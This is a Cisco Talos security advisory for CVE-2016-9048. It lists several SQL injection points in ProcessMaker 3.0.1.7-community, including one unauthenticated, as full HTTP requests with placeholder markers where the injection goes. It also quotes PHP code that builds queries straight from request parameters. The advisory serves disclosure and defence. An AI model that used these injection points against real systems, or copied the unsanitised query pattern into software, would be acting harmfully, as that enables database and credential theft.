Headline
CVE-2016-9048: TALOS-2017-0313 || Cisco Talos Intelligence Group
Multiple exploitable SQL Injection vulnerabilities exists in ProcessMaker Enterprise Core 3.0.1.7-community. Specially crafted web requests can cause SQL injections. An attacker can send a web request with parameters containing SQL injection attacks to trigger this vulnerability, potentially allowing exfiltration of the database, user credentials and in certain setups access the underlying operating system.
Summary
Multiple exploitable SQL Injection vulnerabilities exists in ProcessMarker Enterprise Core 3.0.1.7-community. Specially crafted web requests can cause SQL injections. An attacker can send a web request with parameters containing SQL injection attacks to trigger this vulnerability, potentially allowing exfiltration of the database, user credentials and in certain setups access the underlying operating system.
Tested Versions
ProcessMaker Enterprise Core 3.0.1.7-community
Product URLs
https://www.processmaker.com/community-2
CVSSv3 Score
7.4 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
CWE
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
Details
SQL injection has been found and confirmed within ProcessMarker Enterprise Core. A successful attack could allow an attacker to access information such as usernames and password hashes that are stored in the database.
The following URLs and parameters have been confirmed to suffer from SQL injections and could be exploited by autenticated attackers:
GET /sysworkflow/en/neoclassic/events/eventsAjax?
request=eventList&start=1&limit=25&process=1&type=1&status=1&sort=[SQL INJECTION]&dir=ASC
HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
POST /sysworkflow/en/neoclassic/cases/proxyPMTablesSaveFields.php HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
callback=1&dir=1&sort=[SQL INJECTION]&query=1&table=1&action=1
POST /sysworkflow/en/neoclassic/cases/proxyProcessList.php?t=1&callback=a&dir=/&query=13
HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
sort=[SQL INJECTION]
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?function=changeLabel&cat=1[SQL
INJECTION]&node=1&lang=1&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?
function=changeLabel&cat=1&node=1&lang=1[SQL INJECTION]&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?
function=changeLabel&cat=1&node=1[SQL INJECTION]&lang=1&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?function=changeLabel&cat=1[SQL
INJECTION]&node=1&lang=1&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?
function=changeLabel&cat=1&node=1&lang=1[SQL INJECTION]&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?
function=changeLabel&cat=1&node=1[SQL INJECTION]&lang=1&langLabel=1&label=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
Unauthenticated SQL injection:
GET /gulliver/genericAjax?request=storeInTmp&pkt=int&pk=[SQL Injection]&table=a[SQL
Injection]&cnn=[CONNECTION NAME] HTTP/1.1
Host: 192.168.56.101
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close Note: For this SQL injection to work a 'cnn' parameter needs to be know as that is the parameter used to establish the connection with the database. The following code which can be directly invoked from the server presents this issue:
gulliver/methods/genericAjax.php
173 case 'storeInTmp':
174 try {
177 $con = Propel::getConnection($_GET['cnn']);
178 if($_GET['pkt'] == 'int'){
179 $rs = $con->executeQuery("SELECT MAX({$_GET['pk']}) as lastId FROM {$_GET['table']};");
180 $rs->next();
181 $row = $rs->getRow();
182 $gKey = (int)$row['lastId'] + 1;
183
184 } else {
185 $gKey = G::encryptOld(date('Y-m-d H:i:s').'@'.rand());
186 }
187
188 $rs = $con->executeQuery("INSERT INTO {$_GET['table']} ({$_GET['pk']}, {$_GET['fld']})
VALUES ('$gKey', '{$_GET['value']}');");
189
190 echo "{status: 1, message: \"success\"}";
191 } catch (Exception $e) {
192 $err = $e->getMessage();
193 //$err = eregi_replace("[\n|\r|\n\r]", ' ', $err);
194 $err = preg_replace("[\n|\r|\n\r]", " ", $err); //Made compatible to PHP 5.3
195
196 echo "{status: 0, message: \"" . $err . "\"}";
197 }
198 break;
199 }
200 }
Mitigation
Restrict access to known, trusted users and hosts.
Timeline
2016-02-15 - Vendor Disclosure
2017-07-19 - Public Release
Discovered by Jerzy Kramarz of Portcullis Computer Security Limited.